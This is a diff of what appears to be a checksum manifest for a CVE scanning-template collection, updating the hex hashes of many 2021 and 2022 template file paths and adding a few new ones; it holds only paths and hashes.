http/cves/2021/CVE-2021-25281.yaml:f0739a4ffae86374323dd426842360d438c536b2 -http/cves/2021/CVE-2021-25296.yaml:c14ddb66d0c0d4b878b80dd68ac1683aa4b8737d -http/cves/2021/CVE-2021-25297.yaml:26326c0d3a983b57471f0090c74d4c72e675ab16 -http/cves/2021/CVE-2021-25298.yaml:09af25bb03c7058a6f463cd887620d805d42a7b8 -http/cves/2021/CVE-2021-25299.yaml:67489efad8f1e678113f85219ae309da82ac4e64 +http/cves/2021/CVE-2021-25296.yaml:3c66731902086992cdddb0289373b8f5fd0b9c85 +http/cves/2021/CVE-2021-25297.yaml:5466c149d4d256b5262b13482450f474d6c038d5 +http/cves/2021/CVE-2021-25298.yaml:e4f0bb06fdba5d0f76e64d2fc5ebee6a45285e93 +http/cves/2021/CVE-2021-25299.yaml:57f4d0ae877e768e48eae42d1da370cc658075f9 http/cves/2021/CVE-2021-25646.yaml:4bd3f96db685ae3a0e20ec0f93c816d9e73b98a9 http/cves/2021/CVE-2021-25864.yaml:19a96678b3b7112ca58822bdb5f75f4b6ef6c85c http/cves/2021/CVE-2021-25899.yaml:67944ea8d5b42e747bb55affdd002f4f40d65fd5 @@ -1520,7 +1562,7 @@ http/cves/2021/CVE-2021-26084.yaml:946a3bc637e3f3306995d7123f43ba17224db8c7 http/cves/2021/CVE-2021-26085.yaml:4dc254791017f137ee3939e1a60cc615467b09ab http/cves/2021/CVE-2021-26086.yaml:82330a5c19d9fd81a50c7fdd236662bf25cdbd65 http/cves/2021/CVE-2021-26247.yaml:50e36d499fc02daf94c7333e952062e98608c2bb -http/cves/2021/CVE-2021-26295.yaml:a64f8723a37162954c2fbff0380ec6c114a1a741 +http/cves/2021/CVE-2021-26295.yaml:e6f7811175a1821785d8826f3176575e36ab4070 http/cves/2021/CVE-2021-26475.yaml:909a4435796ad98ea2bb5af7455162b49f0a95be http/cves/2021/CVE-2021-26598.yaml:8b1450b4613c086fea18b65fb7e472a5df5ab8ff http/cves/2021/CVE-2021-26702.yaml:1ba865cb517a00bf7b4bd078fae905d76687d265 @@ -1528,24 +1570,25 @@ http/cves/2021/CVE-2021-26710.yaml:a5bf1ee25d239914abef3fd20a982fa7017dc932 http/cves/2021/CVE-2021-26723.yaml:3eeabbb2f2ae372f0a57a47810c87504fe7dfe91 http/cves/2021/CVE-2021-26812.yaml:2c660d64ac995ae472de3687faa6e06b0efa23f0 http/cves/2021/CVE-2021-26855.yaml:9f2dfd66d978582ab411186bb519273280193efa +http/cves/2021/CVE-2021-27124.yaml:137797b7cfa1f25edb6c0036e3073723702310a7 http/cves/2021/CVE-2021-27132.yaml:03c81dd2532f87a7b42ef4ea2b2af09fa1af1abb -http/cves/2021/CVE-2021-27309.yaml:a6d5a9fa360b7cad78cfb1e13a7f7dc44138df43 +http/cves/2021/CVE-2021-27309.yaml:a0bdd74f9183a10e990a8298d3b90345dd83ed9a http/cves/2021/CVE-2021-27310.yaml:be75dbe4353f3957f15eff5b927505cc4ad762e7 -http/cves/2021/CVE-2021-27314.yaml:7ca7e389e8142fa846f8dd253e1144ff9a7e415b -http/cves/2021/CVE-2021-27315.yaml:cd97e6bdf1a884dac9166baeed1368c2ae630f6a -http/cves/2021/CVE-2021-27316.yaml:4b661edfd02d408559c1568133101b55edd94ff1 -http/cves/2021/CVE-2021-27319.yaml:f52d38e6a617bf04ef6c6e2b897c3eb89d8bda12 -http/cves/2021/CVE-2021-27320.yaml:e187b2cb23874dfe302af42b00fc2f0483e2d560 -http/cves/2021/CVE-2021-27330.yaml:fe46dc194d8accf7c6b594acd86ee19b4e9da57c +http/cves/2021/CVE-2021-27314.yaml:330db402dff788cd9ec2003b09c7766e90a4a4a0 +http/cves/2021/CVE-2021-27315.yaml:b9c4f69e54435581eb24bceea43d779f273d00e3 +http/cves/2021/CVE-2021-27316.yaml:c5e2e8d5c9725ae8b0c8bbb8b5abe928a1c06cbf +http/cves/2021/CVE-2021-27319.yaml:0d428759eff7f42222a8f93d4d473bdda6507f75 +http/cves/2021/CVE-2021-27320.yaml:1a6d65bf4e2b7d1ee326e6deb03deba33e94047e +http/cves/2021/CVE-2021-27330.yaml:e900591b60f561f8edad22e468c89c482e41bf53 http/cves/2021/CVE-2021-27358.yaml:f5e7d539b9a39719f4c72483a31bf0c8219b5e8f -http/cves/2021/CVE-2021-27519.yaml:14a21db806650ad9f43c06adc460db62295b4833 -http/cves/2021/CVE-2021-27520.yaml:4e865d042d7d8257ae97af9d0961ebb72e3760d2 +http/cves/2021/CVE-2021-27519.yaml:fa83303ec7d244171520fc4f188ce047f0026322 +http/cves/2021/CVE-2021-27520.yaml:2aee80f2abf74e1779d9e3484a8653194435dec0 http/cves/2021/CVE-2021-27561.yaml:2d5a6c05ade7d8ce193adb33128a4e7b5a91cc8b http/cves/2021/CVE-2021-27651.yaml:4c65f15e774df73220ab1bdaa8055d4c832f7de6 http/cves/2021/CVE-2021-27748.yaml:5ab336ed10589727b09f9d8edb7fba1c771eb6b5 http/cves/2021/CVE-2021-27850.yaml:07bf163930db1c2b079bd8f6276e958d87f83a03 http/cves/2021/CVE-2021-27905.yaml:8a8c076216830b2d0503de53c3fca2ced596c672 -http/cves/2021/CVE-2021-27909.yaml:10330e48f0a7a2f93414d689aeb845f63a0aee7d +http/cves/2021/CVE-2021-27909.yaml:7429b4a5c27063e13bbe0b34097f6b3ba18f4bd7 http/cves/2021/CVE-2021-27931.yaml:e92b180420b3fbfd91e65988a0fe4ec59b55a353 http/cves/2021/CVE-2021-28073.yaml:974a395dc40f2381a9fbf5e9112816653e02393a http/cves/2021/CVE-2021-28149.yaml:6e00f8ba0ef96685621b24e4fb30e44e5c73b00e @@ -1554,7 +1597,7 @@ http/cves/2021/CVE-2021-28151.yaml:c2fd6f75882a8cdd57cf411816d3089838f84fcb http/cves/2021/CVE-2021-28164.yaml:ab5fea26783a2bff67c8993be4f2eaa9e918bbe7 http/cves/2021/CVE-2021-28169.yaml:ec9339fc7aeb15a2cbe7ed10ebcbd9935e16107a http/cves/2021/CVE-2021-28377.yaml:a8de772a1798e704ac54bd77460a2857c4705c8f -http/cves/2021/CVE-2021-28419.yaml:2941d4ac3589b2b5cdd3f526e91fb84b5b544765 +http/cves/2021/CVE-2021-28419.yaml:55b2404be56f6ad7170a5d4bed04d650e69342fc http/cves/2021/CVE-2021-28854.yaml:9f8fe4c59960b7f1557f90703eede13b31fddf1f http/cves/2021/CVE-2021-28918.yaml:a6f5da5eee26e171a6640329a929a5fa58853ad5 http/cves/2021/CVE-2021-28937.yaml:201b2e61474e400035bb09443b42bb776cd016a1 @@ -1563,14 +1606,14 @@ http/cves/2021/CVE-2021-29203.yaml:a9b88e20456e3f7f6c3e4e0cc205f72626984d6f http/cves/2021/CVE-2021-29441.yaml:1e28eea01fd9562490d8f5542e481e369befc17b http/cves/2021/CVE-2021-29442.yaml:a85a41c86afdfca0a4416a6872911ea667d40dc0 http/cves/2021/CVE-2021-29484.yaml:6c267d1bae9725dac5bc300d29a0e5c051358c11 -http/cves/2021/CVE-2021-29490.yaml:3b38e11500f843b85f2c21f0746c3555db725562 +http/cves/2021/CVE-2021-29490.yaml:b02a0ba6ce9a18883c8e1aea40453e243febd73c http/cves/2021/CVE-2021-29505.yaml:5332302fe60abf68b9d2314ed1add75dedbeaafa http/cves/2021/CVE-2021-29622.yaml:7f4e9921052be64dcca4167381c1832fba77586a http/cves/2021/CVE-2021-29625.yaml:16ad729bc94c73f0e96379019907ec7e9b99f414 http/cves/2021/CVE-2021-3002.yaml:bdb170a8a01c7b0b386655e5101b638e7fcae76e http/cves/2021/CVE-2021-30049.yaml:b0767116bd7d8fe2eb06387450bfdf409691c976 -http/cves/2021/CVE-2021-30128.yaml:ad4d3868433107b5bb5caa4f8758a302d0517066 -http/cves/2021/CVE-2021-30134.yaml:88a1ea201a8df7d5be09ec4d45ca8fe047a8f988 +http/cves/2021/CVE-2021-30128.yaml:2e025dfbaa47cdc994958905d4bcf66caadd9f48 +http/cves/2021/CVE-2021-30134.yaml:6ba062816bfa9045c6226e606c51429452781a99 http/cves/2021/CVE-2021-30151.yaml:9b2af7e2a9eaa72d4851afed42fc3db15c15368e http/cves/2021/CVE-2021-3017.yaml:654d86daf71a11198da48117d27cb3d73c56ef56 http/cves/2021/CVE-2021-30175.yaml:190495b81f869cb64fa0b635825c5c72c99bd928 @@ -1578,7 +1621,7 @@ http/cves/2021/CVE-2021-3019.yaml:67797feca0cd8b11fa39f4cdb384aaad0edb96a8 http/cves/2021/CVE-2021-30213.yaml:9ebeb237f2127162b44f108b5b8a3039cfec400a http/cves/2021/CVE-2021-30461.yaml:2160800bff13da52c99258c012831a0d229d788f http/cves/2021/CVE-2021-30497.yaml:e9e2230811a86b0e8d4f40be306e5f242ccf5b4e -http/cves/2021/CVE-2021-3110.yaml:a9be44e7cdee9972d5a5855f404ef711e1527aeb +http/cves/2021/CVE-2021-3110.yaml:0d0197f4f1fb02d89f0eae3e1f2a3e972d4e162e http/cves/2021/CVE-2021-31195.yaml:c155715be346b1e5b328050341fd364a985d1534 http/cves/2021/CVE-2021-31249.yaml:962ee355a4ceff3857f2c808ac51a5d662065fe7 http/cves/2021/CVE-2021-31250.yaml:14f9a3eef10c3995bc08084c484d28528510c75e @@ -1613,7 +1656,7 @@ http/cves/2021/CVE-2021-3374.yaml:facef627d497f44cc8cf413903009ff234246d58 http/cves/2021/CVE-2021-3377.yaml:7cd4dc5a07ca12c2410508d98a6f2ce631b33e3f http/cves/2021/CVE-2021-3378.yaml:8d339ffba8b25ebbb7188850b9288f17896b74ab http/cves/2021/CVE-2021-33807.yaml:8fcea17e43a0575f3ace34f3964739d90ab93528 -http/cves/2021/CVE-2021-33851.yaml:6dd800666fb722a45af7bbf38de0938bf2581066 +http/cves/2021/CVE-2021-33851.yaml:d15375c56b3bac11326997f938348d6dfc673405 http/cves/2021/CVE-2021-33904.yaml:d58da06905672e7c3d214c6df99ec5ba7e4c43b2 http/cves/2021/CVE-2021-34370.yaml:08e12de14fc2ab4563b11a53c4dba03bbeffd50e http/cves/2021/CVE-2021-34429.yaml:39856bf5de84ab25f82f4720f8ffc94dfc4d96eb @@ -1627,63 +1670,70 @@ http/cves/2021/CVE-2021-35265.yaml:12b8bd962e5bce56c4678e830391f7f0bc409977 http/cves/2021/CVE-2021-35336.yaml:8f80f32a8d90699d765b5b4c600d19b9f5915580 http/cves/2021/CVE-2021-35380.yaml:d889dd64a4e3234b49c63d0f3d141aeb3ae70e0a http/cves/2021/CVE-2021-35464.yaml:e990377d429daa3541235e031221660eaf7475cb -http/cves/2021/CVE-2021-35488.yaml:9e7c687fbaa1d75fdc441dabba9e7ec355a448ca +http/cves/2021/CVE-2021-35488.yaml:1e96c8052d5a0b9a8907893cbe7a327b81c1d8df http/cves/2021/CVE-2021-35587.yaml:56c42a0887da02ed2b2dc632d7eb6eec2a2500bb http/cves/2021/CVE-2021-3577.yaml:8a0feeefeb32b26df92bbd2697b24901dff7df53 http/cves/2021/CVE-2021-36260.yaml:c60b8bf65eb603563b01d4691ad640ef3a393de5 http/cves/2021/CVE-2021-36356.yaml:ec6e9724d2bb6065e1bde7d82a49bcc7a716e365 http/cves/2021/CVE-2021-36380.yaml:4c8a94704c6f010156fac40ab817bb239a6d7013 -http/cves/2021/CVE-2021-36450.yaml:0639ac330542cb020e1305ffdbd5af701afe0448 +http/cves/2021/CVE-2021-36450.yaml:3833dd6a42b2ca33bb0c6a1dbb598bdde4c7bbfd http/cves/2021/CVE-2021-3654.yaml:7e1d54d2842cd4128a147d4c7bed1299dab66068 http/cves/2021/CVE-2021-36580.yaml:7e3ca62c123edd3ccda7028708ce58fd73b49ff7 -http/cves/2021/CVE-2021-36748.yaml:64e885f262bb4fb33e9c9eab30ee1b4c134726c1 +http/cves/2021/CVE-2021-36748.yaml:d95d1d8a451ed92db10c02e56bfe09520c0f2932 http/cves/2021/CVE-2021-36749.yaml:0707320c97a58337e2cb0ed86ea487b1771c9df5 -http/cves/2021/CVE-2021-36873.yaml:ca18f2a2433a4e7b72b94282bd02d11157542ccd -http/cves/2021/CVE-2021-37216.yaml:1982c377883de7fc451f744a38264c8a6cfdff09 -http/cves/2021/CVE-2021-37304.yaml:92c1d9f816980277c1cb52890eb09ad79dfdecc0 -http/cves/2021/CVE-2021-37305.yaml:8c3d810b0bda5ca56ce68355aae3536ffc8a89db -http/cves/2021/CVE-2021-37416.yaml:372b82baf940655aecb43a01d54be3d3bb443484 +http/cves/2021/CVE-2021-36873.yaml:e886f6a22f1687fd263a15a30d35023acc4bc3a0 +http/cves/2021/CVE-2021-37216.yaml:1be0aaf902c17fb70de891302cadf570211675ca +http/cves/2021/CVE-2021-37304.yaml:4ec90341b1edc55e7bf5e12ad7fd9cebda6d4b8f +http/cves/2021/CVE-2021-37305.yaml:31785f615ed5121225dd6c06ec0f603ab73a6f60 +http/cves/2021/CVE-2021-37416.yaml:1ceb60fbd02f8d613169df89b71adbe247cc7cf6 http/cves/2021/CVE-2021-37538.yaml:bdf618dacb946f89877dba17be36b8a8129cb74c http/cves/2021/CVE-2021-37573.yaml:bf029d199e3b2a8b57406f3ffc0bf41c24d55ee6 http/cves/2021/CVE-2021-37580.yaml:f9100c9db8f1805797e80e8a4b556a369b6e1643 -http/cves/2021/CVE-2021-37589.yaml:ce0b8e30e45393c38a890dc240dca0de34836ce3 +http/cves/2021/CVE-2021-37589.yaml:6f14088d3b0759892dfdca968a614c0e24740aae http/cves/2021/CVE-2021-37704.yaml:99cffe4638d7c916335b025c6f9e6af7438390d9 http/cves/2021/CVE-2021-37833.yaml:10c873adabbec11db1db9d9dbf91f20d768d82de http/cves/2021/CVE-2021-38314.yaml:95e29f1eb7796ceded24d412a79911f4892a820f -http/cves/2021/CVE-2021-38540.yaml:79e1d251cc97c4f8006720a2ef20f6a98ec205a5 +http/cves/2021/CVE-2021-38540.yaml:04e94e40e55e2f69b983c7dc9f1322e8f6bc9714 http/cves/2021/CVE-2021-38647.yaml:c6010a60e670f83ce7dce1c2f6a0edb3f6c59223 http/cves/2021/CVE-2021-38702.yaml:c6415bd08408c49173807489963d264b9eac22ed http/cves/2021/CVE-2021-38704.yaml:9ed95715db1851ffd95c0b88f783808be0165bfc http/cves/2021/CVE-2021-38751.yaml:2c55c28ac364fbb961082aa28532ca26e6911cd3 http/cves/2021/CVE-2021-39141.yaml:f09ad9235d7bd038860e8c9db52f7d05b0661b17 -http/cves/2021/CVE-2021-39144.yaml:5773ec0a83268cd497e259b5c1bf447b90e8a0cd +http/cves/2021/CVE-2021-39144.yaml:8412d45b21eae50f7e1d19e8bb8e7e47fb2897e4 http/cves/2021/CVE-2021-39146.yaml:0e6315d0d0b8aaadfc26c7e07a9a20a8a8812ca2 http/cves/2021/CVE-2021-39152.yaml:c89141178cdbb1c06d29e6fb1e9a040472e373b0 -http/cves/2021/CVE-2021-39165.yaml:2639463ece14a68f556d1f39525040ddd5da768c +http/cves/2021/CVE-2021-39165.yaml:bf9f6cf3ab3e0f4139dfb206927dacb942337a3a http/cves/2021/CVE-2021-39211.yaml:7d9e5216cd26dca45fb6056cc2fbd6cd32550909 http/cves/2021/CVE-2021-39226.yaml:7ba75d1be9576a096821b38703aa7a1fa67b0cad http/cves/2021/CVE-2021-39312.yaml:e97334f0d88c1fc3bf29ca61947b0dcb4c3a2e74 http/cves/2021/CVE-2021-39316.yaml:3ea6eeee5568607b7c706f57b05cb14c762a2a40 -http/cves/2021/CVE-2021-39320.yaml:becd96d31a253b5711062906e3f22554081fa2eb +http/cves/2021/CVE-2021-39320.yaml:9b99e8e9420141237c8afe4b6b42cca9994402b9 http/cves/2021/CVE-2021-39322.yaml:4c8c1951e0a2ea0b01572b6b04fbf720dd5cffe9 http/cves/2021/CVE-2021-39327.yaml:4d0b0867fed57205cbda7408b1a7952621bfebf3 http/cves/2021/CVE-2021-39350.yaml:9b59da2ff9824f5501b754efd34c1d5311a9316d http/cves/2021/CVE-2021-39433.yaml:dd22a28f5d688a92e715a4370e21af977118bc02 http/cves/2021/CVE-2021-39501.yaml:6c8a285530f1c6bd9d4f95ddb5275ac683f362e6 -http/cves/2021/CVE-2021-40149.yaml:96f517501bbabee2565adfa1f8cec5cff90a9559 -http/cves/2021/CVE-2021-40150.yaml:f78901e7fa54770c1e5fd6dd8ca7fcca2eb96375 +http/cves/2021/CVE-2021-40149.yaml:fc9f77e55f246f0b697164a9bb6796460ad3386e +http/cves/2021/CVE-2021-40150.yaml:7fdea5ba4dac2429f82ca4c94c049dedd90930ec http/cves/2021/CVE-2021-40323.yaml:f413121168d9c1bd12cb1446b31e3ec8fad4207f http/cves/2021/CVE-2021-40438.yaml:efb9a12bc9809dc844988e4a62841be47b832e2c http/cves/2021/CVE-2021-40539.yaml:79009fd1b52b7a2ff6438fb068ab8193d4e83589 http/cves/2021/CVE-2021-40542.yaml:5edac6cd4ca0edcdd24de9ac64ed806b4b1c0a97 -http/cves/2021/CVE-2021-40661.yaml:86be33ae87f2ab3bb0613a3860357f0fda757f99 -http/cves/2021/CVE-2021-40822.yaml:7bd3d0fef41088e158465050e7ce8c7d2b219ab7 +http/cves/2021/CVE-2021-40661.yaml:a5399ac44a7097c712ba2d2d3c7cc787ad32e657 +http/cves/2021/CVE-2021-40822.yaml:8e429517b1540bb93bb1ac178c2c1f91dcf225d7 http/cves/2021/CVE-2021-40856.yaml:e71f6b3d5bb5b3894dd5b99712333c41b9932183 http/cves/2021/CVE-2021-40859.yaml:9fcdfbaa143fae8dfb69fbd4af6a66121b4a91d8 http/cves/2021/CVE-2021-40868.yaml:5b049bfbb5845494babb82418eafa9f63b717e0d http/cves/2021/CVE-2021-40870.yaml:c90acb6e3febebc49c06d8091d945db256093462 http/cves/2021/CVE-2021-40875.yaml:d9dbf6e349e00511eee8e27c3c5e6f7e61bdb1ab +http/cves/2021/CVE-2021-40908.yaml:019099452ecf88aad388040cebef29b6e7ae4e7f http/cves/2021/CVE-2021-40960.yaml:8c11cf9344c7fa32fe56027a460a2b6d97c26842 +http/cves/2021/CVE-2021-40968.yaml:73923365c5a6fb5375e577b7121b8f57f2fdcc5a +http/cves/2021/CVE-2021-40969.yaml:2a5fa3be95f998466cfc276bbf1fd319dd513f27 +http/cves/2021/CVE-2021-40970.yaml:15bc9e96f58cb7cc710d828b481eebbefe84ae3d +http/cves/2021/CVE-2021-40971.yaml:17777a194f94fedeb34813a7759cf9c580f0f8ae +http/cves/2021/CVE-2021-40972.yaml:551cbe522d193ea33f642996fd9dacabda86c9bf +http/cves/2021/CVE-2021-40973.yaml:34f4749d5c1f2925647cc438f9ace9c2d829a668 http/cves/2021/CVE-2021-40978.yaml:020bfb1f6a305b9623a2f50d3bc144ccc0545e84 http/cves/2021/CVE-2021-41174.yaml:27ea7a0e2d1c370c39171228e95a9dfcfd581735 http/cves/2021/CVE-2021-41192.yaml:c765092f1f1084d123ee545cd703870357aa0eb5 @@ -1694,19 +1744,19 @@ http/cves/2021/CVE-2021-41291.yaml:3c4ec16001d04bcb25dc9f6651606134a8ac44be http/cves/2021/CVE-2021-41293.yaml:22a9ae1ce6797e95ab1a1f4c8d66e408420d7424 http/cves/2021/CVE-2021-41349.yaml:fa0d3cc3697cfda5a729dc6af512f8f0fc8cb8fe http/cves/2021/CVE-2021-41381.yaml:35dd48f03b231a194d5e5639c7d4e7d8e61913b4 -http/cves/2021/CVE-2021-41432.yaml:8de6eae2c915c8dbbace48f7ccea365dde43fd0f +http/cves/2021/CVE-2021-41432.yaml:88686b80bc2d490aeb19f277c00aca43df5aae96 http/cves/2021/CVE-2021-41467.yaml:784fee8b870970e2a68ce9758d06eabe87b24344 http/cves/2021/CVE-2021-41569.yaml:80220417109e2ca89adafaff33af0d7c6e7de70e http/cves/2021/CVE-2021-41648.yaml:1c6987461122016568772832566c99bcb4bf4727 http/cves/2021/CVE-2021-41649.yaml:c3b46bb46052de82997aea5da8784f456dc6acd4 http/cves/2021/CVE-2021-41653.yaml:5e7a31ccf1fb728e21d4fe47d35008c6ae1678c7 http/cves/2021/CVE-2021-41691.yaml:f616cc8ce80eaedf2e9df69dd41cea8ce9560668 -http/cves/2021/CVE-2021-41773.yaml:3cb06aa561230c150b7c7b332fdac38d47cf7e6c +http/cves/2021/CVE-2021-41773.yaml:f2a98a222c8310a40c9cafa63a26ad25fce6290a http/cves/2021/CVE-2021-41826.yaml:39034e4cda4da06fb9552f8a571e8b10f1877068 -http/cves/2021/CVE-2021-41878.yaml:dd3ca617da0a45662b1ee1303bd4a9e86da07984 +http/cves/2021/CVE-2021-41878.yaml:872a0c83301b47c9e6313f2a6cbc8e1bec4ad7a1 http/cves/2021/CVE-2021-4191.yaml:4396434fa9a0993b4b91eb5f30556182e9890bdf http/cves/2021/CVE-2021-41951.yaml:68f3c87d933823c970381f99fd946b40e1347170 -http/cves/2021/CVE-2021-42013.yaml:81b9b4295bde5c8984f9b660696827d8ebdc6ba4 +http/cves/2021/CVE-2021-42013.yaml:521983ff934b8cd8dd115ca22a7e8eff7bd2b3ac http/cves/2021/CVE-2021-42063.yaml:aa523fe713821d66db42e7cd94f32dea91e0678b http/cves/2021/CVE-2021-42071.yaml:ae2b781b9f16253cf546fec3588b88bb9db07dae http/cves/2021/CVE-2021-42192.yaml:7e784ffe2014f23e3c82309d5454858b7bb6ef60 @@ -1716,22 +1766,24 @@ http/cves/2021/CVE-2021-42551.yaml:62e90a6d3ae4367b1dac1f7bc3bd81f875995e1f http/cves/2021/CVE-2021-42565.yaml:486dd01d430b6f0b942fbde45e866db80188bf1b http/cves/2021/CVE-2021-42566.yaml:f3169b7f6f60aedbc66d1522a6eb24bd0dfa1285 http/cves/2021/CVE-2021-42567.yaml:32c88cb2a16c1644e96bb8fe9a114f2895b55ab2 -http/cves/2021/CVE-2021-42627.yaml:8e9606b8c1b502ddd0ce86f92e3e28211f19869b -http/cves/2021/CVE-2021-42663.yaml:dbfb7773d3e80afadda53c2395b02be02712d598 -http/cves/2021/CVE-2021-42667.yaml:cd635c49c28ae9e29a7525d80f737f024c108945 +http/cves/2021/CVE-2021-42627.yaml:173bf249624cb2a8f1a46c77456ee65c0f63b943 +http/cves/2021/CVE-2021-42663.yaml:790c9372ce6da2c326c3dbc5127b610013a5c785 +http/cves/2021/CVE-2021-42667.yaml:46338878d5df8ae5baa7d524a43967cf12a561e4 http/cves/2021/CVE-2021-42887.yaml:35fed176e59d8b77182c892629987ddb259ec4c8 http/cves/2021/CVE-2021-43062.yaml:831e3eaa775eb329839d2b6aa055db3d6337c24e http/cves/2021/CVE-2021-43287.yaml:49c52d136e1b100afe8e823b210b2cf12b32b6f9 -http/cves/2021/CVE-2021-43421.yaml:9ab748d1975d819357b1ea73257b4e4929689578 +http/cves/2021/CVE-2021-43421.yaml:ddf37da2771a2198726264252f4b753e13432255 http/cves/2021/CVE-2021-43495.yaml:6e5f43e83c70b07e04558cb19c374a48621c14f6 http/cves/2021/CVE-2021-43496.yaml:fb8c4e23a65dab0af684afa383cd55836a2a7cb6 -http/cves/2021/CVE-2021-43510.yaml:d42d03bbf83d95b3cd5b03d746b5a6a8091e3a72 -http/cves/2021/CVE-2021-43574.yaml:02cc7bb5aa83f724c2ff20da61b810d8fac776a1 -http/cves/2021/CVE-2021-43734.yaml:b9cab38e88c28cb9ce47e6e6c2562282c8aa59a5 +http/cves/2021/CVE-2021-43510.yaml:6df39012660aa9493d9e4a2d36b54bd6393f7b0e +http/cves/2021/CVE-2021-43574.yaml:58ff17e4c3a7ea7b2be8e886500c9067e98af6bc +http/cves/2021/CVE-2021-43725.yaml:36990079e504d6b230db99035ad8e43acdef8090 +http/cves/2021/CVE-2021-43734.yaml:d659477a20d9728aca3c594e7d3bc6dcf08c4c1b http/cves/2021/CVE-2021-43778.yaml:f08be58409856e45ed966b0d27103d7af708c5cd -http/cves/2021/CVE-2021-43798.yaml:33cd45487f3ce6a322555ab1abf9ed537f2fbbf2 +http/cves/2021/CVE-2021-43798.yaml:70531e175da021d868e147369c74009bb0664cca http/cves/2021/CVE-2021-43810.yaml:4b085ef3c4b3898a81fcaeb52093471253c40902 http/cves/2021/CVE-2021-44077.yaml:20ad1bf0e204493c261edaee0ab5bceac7b4ed7f +http/cves/2021/CVE-2021-44138.yaml:d532b862e0e65dd6c492db712643e6ffd4661b29 http/cves/2021/CVE-2021-44152.yaml:455f1a952a207b109fd5e1a7a2a8b9186fee66ff http/cves/2021/CVE-2021-44228.yaml:8ebeadb7fa7adf3b85ce90e8a135f93f29950863 http/cves/2021/CVE-2021-44427.yaml:b20e854b90060e1bd34195922edef3262f2ebf36 @@ -1745,473 +1797,521 @@ http/cves/2021/CVE-2021-45046.yaml:5c7d4e3277e0edaace1e9f964b13398391178c13 http/cves/2021/CVE-2021-45092.yaml:2596555d170a533f62a3553cb52991633a8271cc http/cves/2021/CVE-2021-45232.yaml:7e76b7bdf61ed19db2954f6f75994e975635d70e http/cves/2021/CVE-2021-45380.yaml:8738a3ee69dd2f8e234e1373fa641635da242b72 -http/cves/2021/CVE-2021-45422.yaml:5b0a3e3c1944c17f8eb6e8b030c8b80393b0d2ec -http/cves/2021/CVE-2021-45428.yaml:2050ad6574460d0f72076bd451f7c2895332f489 +http/cves/2021/CVE-2021-45422.yaml:851ff3fce506b32f0e0cb5f04303446dbca4f647 +http/cves/2021/CVE-2021-45428.yaml:78a394bf33d6ef88a637a90d7169d1125b13f983 http/cves/2021/CVE-2021-45967.yaml:07b9be37aa7ac98874324680c9b39bc5bb03dcaf http/cves/2021/CVE-2021-45968.yaml:a45ac42c6aeb3f9ce86bd98ab150d683dbcf653c http/cves/2021/CVE-2021-46005.yaml:9e72751e395f8852a7459f10659fb0c22581d909 -http/cves/2021/CVE-2021-46068.yaml:ed3c64945e1c807a2af83a76f680a703029ece13 -http/cves/2021/CVE-2021-46069.yaml:e80525ec0dd786cb56887ac23d254961902dd0b3 -http/cves/2021/CVE-2021-46071.yaml:cae2dfdb5c0f5c255bce4bf987bc2c7fed4ab881 -http/cves/2021/CVE-2021-46072.yaml:7d1c73396a8f7d8f7d32f36be7b6eb40e6de8f97 -http/cves/2021/CVE-2021-46073.yaml:9a79867bfc48e35d316da67ce4918102d516c771 -http/cves/2021/CVE-2021-46379.yaml:bad4c76866aeac9043b9e0d3a4dd3f1bee795b27 +http/cves/2021/CVE-2021-46068.yaml:146bcfc67dbaab09fe08b2d39ba2cf7651902584 +http/cves/2021/CVE-2021-46069.yaml:7477307ba737e0cfef0589503c8533854b955da3 +http/cves/2021/CVE-2021-46071.yaml:c840a48687cf0bfac5f8686de4741318a9f1fd00 +http/cves/2021/CVE-2021-46072.yaml:8331dee1bf1604452fde664cb18bedd5475142f0 +http/cves/2021/CVE-2021-46073.yaml:8225b08155c914c543d557efe1531a932694f520 +http/cves/2021/CVE-2021-46379.yaml:6dc812056f7ee07cc5007a76c3e38abef2a3253a http/cves/2021/CVE-2021-46381.yaml:ccfcddd583bdbb043e401ed129f003578b8a4d17 http/cves/2021/CVE-2021-46387.yaml:4c99fe80f15d731b588cff0b641d22adb6e234db -http/cves/2021/CVE-2021-46417.yaml:82716c5d83bd3d46fde66c54bc8f48fd67129cb1 -http/cves/2021/CVE-2021-46422.yaml:93634a7ab0f49be224df1ebc9d77e484e6cd4207 -http/cves/2021/CVE-2021-46424.yaml:b7e14f189970d27450ad9776f82d3600bfb4d11b +http/cves/2021/CVE-2021-46417.yaml:ef1332077aba5456d7face1e549877f5a84567f8 +http/cves/2021/CVE-2021-46422.yaml:7408d34e8fcb49f71420a3dad7e8d86f2bcedd65 +http/cves/2021/CVE-2021-46424.yaml:3d8384c0bafc54b6c72409092a1eb23f5d17d5a5 +http/cves/2021/CVE-2021-46704.yaml:ead4e7d9c4a05dfb5aa5045c1b3a1594f6b7c7f8 http/cves/2022/CVE-2022-0140.yaml:e35651cc2f2691a33c578eb28ae40e49f4f66d96 -http/cves/2022/CVE-2022-0147.yaml:78c0c595bb68aed695e3a3b0654d6bfeaf4fdb87 +http/cves/2022/CVE-2022-0147.yaml:f69bf0598fa81721db47ef4dde1daea2e003c887 http/cves/2022/CVE-2022-0148.yaml:6cf0fefded7a6d5ef15848958cd831176f38d621 http/cves/2022/CVE-2022-0149.yaml:28d978200b45b286e043847f9849de213dd16503 http/cves/2022/CVE-2022-0150.yaml:4d2c876546083367573142cf55e656b71f99fbe8 http/cves/2022/CVE-2022-0165.yaml:d87aef23a0dd1ab8833d605cb3176b4c0927f5e8 http/cves/2022/CVE-2022-0189.yaml:70b866b06040408de4f02ff5efce4d4937836d77 http/cves/2022/CVE-2022-0201.yaml:0bea56d3eb16800c28c4f65aad053d6f2fb09587 -http/cves/2022/CVE-2022-0206.yaml:7e947ded37aedf442dceb075ed665567fee731d5 +http/cves/2022/CVE-2022-0206.yaml:e6bb9b73928b9b940dabeedb98256bd2730ebf90 http/cves/2022/CVE-2022-0208.yaml:57ea55d954f30dcc54a7d71e54cec34e05d6806f -http/cves/2022/CVE-2022-0212.yaml:30d094fbfb9e5eec043909478aa975caa5b0bde7 +http/cves/2022/CVE-2022-0212.yaml:fdd46e69af5fa3c7fd594671c9673c9546395f17 http/cves/2022/CVE-2022-0218.yaml:3d7bbc57ae765b978ddadf9f1fbe249411df85c0 -http/cves/2022/CVE-2022-0220.yaml:1675f17857e06c6ec964ba4ea400c516e095c8bc -http/cves/2022/CVE-2022-0234.yaml:2cdf872901d5970eb8f810f56dfee46077e31ef2 +http/cves/2022/CVE-2022-0220.yaml:f345ef9f2fa0720df936c5712930c891fe8a2d6c +http/cves/2022/CVE-2022-0234.yaml:b7c28ed5a29ba7a4a4b1933057e2203b64a28312 